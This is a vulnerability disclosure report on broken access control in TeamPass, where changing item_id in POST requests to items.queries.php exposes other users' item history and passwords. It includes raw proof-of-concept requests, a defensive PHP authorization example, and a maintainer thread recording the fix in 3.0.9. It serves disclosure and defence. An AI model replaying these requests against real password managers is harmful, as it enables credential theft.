Broken Access Control On Item via ID in nilsteampassnet/teampass

Valid

Reported on Apr 5th 2023


Description

By editing the item ID in the request or in the HTML, I can see information about any item via its ID.

Proof of Concept

  1. Create two accounts with permission on two folders and set the permission for each user.

  2. Create an item with each user.

  3. View the details of an item and change item_id in the "view history" request:
POST /teampass/sources/items.queries.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 87
Origin: http://localhost
Connection: close
Referer: http://localhost/teampass/index.php?page=items
Cookie: 98306e16032402cd5ea3b7d8dd796e0630482672fbc73f91e2=9f1f0a5f7b487eea4da2d4c490ebe41ee75827a8f9da5b0c97; eid=2; download_started=0; PowerBB_username=tuanth; PowerBB_password=32298fc135b3fecf012a4c27efbba188; plupload_ui_view=thumbs; teampass_session=1c25dokujscfq8aj1qvp84a3ue; jstree_select=2
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

type=load_item_history&item_id=2&key=tMV9Z62V8X2VqVPz33sFP8mUEF7psK295Fhcy5JHEnkvvuMUyC

History of the item viewed with the permissions of a user who has access to the folder holding this item: the history is shown.

History of the item viewed with the permissions of a user who does not have access to the folder holding this item: the history is still shown.

Impact

An attacker can view the change history of any item and view the password for that item.

Occurrences

Inspect the HTML and change data-item-id="victim_id" to the ID of another user's item.

Click "Copy password".

The password is copied to the clipboard; compare it with the password stored on the item.

POST /teampass/sources/items.queries.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 88
Origin: http://localhost
Connection: close
Referer: http://localhost/teampass/index.php?page=items
Cookie: 98306e16032402cd5ea3b7d8dd796e0630482672fbc73f91e2=a73c739e19c6877c4148b52f56cd2fda7bbc02dc2400017fb7; eid=2; download_started=0; PowerBB_username=tuanth; PowerBB_password=32298fc135b3fecf012a4c27efbba188; plupload_ui_view=thumbs; teampass_session=1c25dokujscfq8aj1qvp84a3ue; jstree_select=2
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

type=show_item_password&item_id=3&key=q6mU2yjxhjcSbT9kCs7XzMLskHvBdGPpBSNF38ZUHPpTh8dLx9
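
Both requests above are ID-driven actions (load_item_history and show_item_password) that return data for whatever item_id the client supplies. The following added PHP example, which is not TeamPass's own code, shows the object-level check such a handler needs: it assumes a constructed in-memory item table and that the caller's visible folders come from the authenticated session rather than from the request.

```php
<?php
// Added example (not TeamPass code): a minimal object-level authorization
// check for ID-based item requests such as load_item_history and
// show_item_password. The item table below is constructed for illustration.

declare(strict_types=1);

// Constructed data: the folder each item lives in and what each item holds.
const ITEMS = [
    2 => ['folder' => 10, 'history' => ['created', 'password changed'], 'pw' => 'pw-A'],
    3 => ['folder' => 20, 'history' => ['created'], 'pw' => 'pw-B'],
];

// Returns the item only if its folder is among the folders the caller may see.
// $visibleFolders is assumed to come from the authenticated session, never
// from the request body, so tampering with item_id cannot widen it.
function loadAuthorizedItem(int $itemId, array $visibleFolders): ?array
{
    $item = ITEMS[$itemId] ?? null;
    if ($item === null) {
        return null; // unknown ID gets the same answer as a forbidden one
    }
    return in_array($item['folder'], $visibleFolders, true) ? $item : null;
}

// Dispatcher in the spirit of items.queries.php: every ID-driven action passes
// the same check before any data (history or password) is returned.
function handleItemRequest(string $type, int $itemId, array $visibleFolders): array
{
    $item = loadAuthorizedItem($itemId, $visibleFolders);
    if ($item === null) {
        // Generic denial; do not reveal whether the ID exists.
        return ['error' => true, 'message' => 'access denied'];
    }
    switch ($type) {
        case 'load_item_history':
            return ['error' => false, 'history' => $item['history']];
        case 'show_item_password':
            return ['error' => false, 'password' => $item['pw']];
        default:
            return ['error' => true, 'message' => 'unknown action'];
    }
}

// A caller who may only see folder 10: their own item (2) is served,
// a tampered item_id=3 (folder 20) is denied for both actions.
print_r(handleItemRequest('load_item_history', 2, [10]));
print_r(handleItemRequest('load_item_history', 3, [10]));
print_r(handleItemRequest('show_item_password', 3, [10]));
```

The same check belongs in front of every other per-item action the endpoint exposes, so that a denial is decided once from the item's folder and the session, never from client-supplied fields.
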
We are processing your report and will contact the nilsteampassnet/teampass team within 24 hours. 6 months ago
TuanTH modified the report
6 months ago
TuanTH modified the report
6 months ago
TuanTH modified the report
6 months ago
We have contacted a member of the nilsteampassnet/teampass team and are waiting to hear back 5 months ago
TuanTH
4 months ago

Researcher


hi @teampass do you have any update in this post?

Nils Laumaillé
4 months ago

Maintainer


hi @tht1997 Thank you for this. As the screen captures are very small and cannot be made bigger, I'm not sure I have the complete issue. But from what I have understood, by modifying the data-item-id directly from the console with another item ID, the user can access the password. Is that correct? If yes, I could reproduce. Indeed, this is possible but the risk seems near to 0 to have someone doing this. IDs are never used in the form, and what can a user do with only a password if he has no URL, no login, etc.? Nevertheless, I will fix this ;)

TuanTH
4 months ago

Researcher


hi @nilsteampassnet, by changing item_id, I can read the information even though the user does not belong to the user group that is allowed.

Nils Laumaillé validated this vulnerability 4 months ago
TuanTH has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Nils Laumaillé marked this as fixed in 3.0.9 with commit 774985 4 months ago
The fix bounty has been dropped
This vulnerability has been assigned a CVE
Nils Laumaillé published this vulnerability 4 months ago
Nils Laumaillé gave praise 4 months ago
Thank you
The researcher's credibility has slightly increased as a result of the maintainer's thanks: +1